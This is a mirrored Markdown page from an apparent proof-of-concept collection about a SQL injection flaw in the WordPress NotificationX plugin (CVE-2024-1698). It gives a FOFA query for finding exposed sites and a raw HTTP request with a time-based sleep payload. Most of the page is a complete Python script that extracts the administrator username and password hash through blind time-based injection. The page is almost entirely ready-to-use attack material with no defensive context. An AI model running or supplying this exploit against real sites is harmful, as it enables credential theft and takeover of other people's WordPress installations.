mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
95 lines
3.2 KiB
Markdown
95 lines
3.2 KiB
Markdown
|
## WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698)
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
body="/wp-content/plugins/notificationx"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
```
|
||
|
|
POST /wp-json/notificationx/v1/analytics HTTP/1.1
|
||
|
|
Host:
|
||
|
|
Content-Type: application/json
|
||
|
|
|
||
|
|
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
|
||
|
|
```
|
||
|
|
|
||
|
|
## 利用基本
|
||
|
|
```python
|
||
|
|
import requests
|
||
|
|
import string
|
||
|
|
from sys import exit
|
||
|
|
|
||
|
|
# Sleep time for SQL payloads
|
||
|
|
delay = 0.3
|
||
|
|
|
||
|
|
# URL for the NotificationX Analytics API
|
||
|
|
url = "http://localhost/wp-json/notificationx/v1/analytics"
|
||
|
|
|
||
|
|
admin_username = ""
|
||
|
|
admin_password_hash = ""
|
||
|
|
|
||
|
|
session = requests.Session()
|
||
|
|
|
||
|
|
# Find admin username length
|
||
|
|
username_length = 0
|
||
|
|
for length in range(1, 41): # Assuming username length is less than 40 characters
|
||
|
|
resp_length = session.post(url, data={
|
||
|
|
"nx_id": 1337,
|
||
|
|
"type": f"clicks`=IF(LENGTH((select user_login from wp_users where id=1))={length},SLEEP({delay}),null)-- -"
|
||
|
|
})
|
||
|
|
|
||
|
|
# Elapsed time > delay if delay happened due to SQLi
|
||
|
|
if resp_length.elapsed.total_seconds() > delay:
|
||
|
|
username_length = length
|
||
|
|
print("Admin username length:", username_length)
|
||
|
|
break
|
||
|
|
|
||
|
|
# Find admin username
|
||
|
|
for idx_username in range(1, username_length + 1):
|
||
|
|
# Iterate over all the printable characters + NULL byte
|
||
|
|
for ascii_val_username in (b"\x00" + string.printable.encode()):
|
||
|
|
# Send the payload
|
||
|
|
resp_username = session.post(url, data={
|
||
|
|
"nx_id": 1337,
|
||
|
|
"type": f"clicks`=IF(ASCII(SUBSTRING((select user_login from wp_users where id=1),{idx_username},1))={ascii_val_username},SLEEP({delay}),null)-- -"
|
||
|
|
})
|
||
|
|
|
||
|
|
# Elapsed time > delay if delay happened due to SQLi
|
||
|
|
if resp_username.elapsed.total_seconds() > delay:
|
||
|
|
admin_username += chr(ascii_val_username)
|
||
|
|
# Show what we have found so far...
|
||
|
|
print("Admin username:", admin_username)
|
||
|
|
break # Move to the next character
|
||
|
|
else:
|
||
|
|
# Null byte reached, break the outer loop
|
||
|
|
break
|
||
|
|
|
||
|
|
# Find admin password hash
|
||
|
|
for idx_password in range(1, 41): # Assuming the password hash length is less than 40 characters
|
||
|
|
# Iterate over all the printable characters + NULL byte
|
||
|
|
for ascii_val_password in (b"\x00" + string.printable.encode()):
|
||
|
|
# Send the payload
|
||
|
|
resp_password = session.post(url, data={
|
||
|
|
"nx_id": 1337,
|
||
|
|
"type": f"clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),{idx_password},1))={ascii_val_password},SLEEP({delay}),null)-- -"
|
||
|
|
})
|
||
|
|
|
||
|
|
# Elapsed time > delay if delay happened due to SQLi
|
||
|
|
if resp_password.elapsed.total_seconds() > delay:
|
||
|
|
admin_password_hash += chr(ascii_val_password)
|
||
|
|
# Show what we have found so far...
|
||
|
|
print("Admin password hash:", admin_password_hash)
|
||
|
|
# Exit condition - encountered a null byte
|
||
|
|
if ascii_val_password == 0:
|
||
|
|
print("[*] Admin credentials found:")
|
||
|
|
print("Username:", admin_username)
|
||
|
|
print("Password hash:", admin_password_hash)
|
||
|
|
exit(0)
|
||
|
|
```
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
## 来源
|
||
|
|
- https://github.com/kamranhasan/CVE-2024-1698-Exploit
|